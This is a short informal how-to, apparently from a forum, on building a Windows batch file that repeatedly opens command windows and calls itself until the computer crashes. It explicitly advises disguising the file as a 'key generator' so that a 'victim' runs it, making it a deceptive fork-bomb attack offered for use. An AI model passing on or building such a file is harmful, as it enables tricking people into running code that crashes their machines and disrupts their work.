goto notepad and type like this

just copy 5 0r any number of starts and paste them continous like this in the end type

hax.bat


now save this file as key generator.bat or any filename u want to give but save only as a .bat file....

The thing is that is will open cmd as many times as u type start it will crash the victims pc nd he has to close it for working again..,

one more thing if u name the file as hax.bat it will continously open the cmd until the pc crashes.....
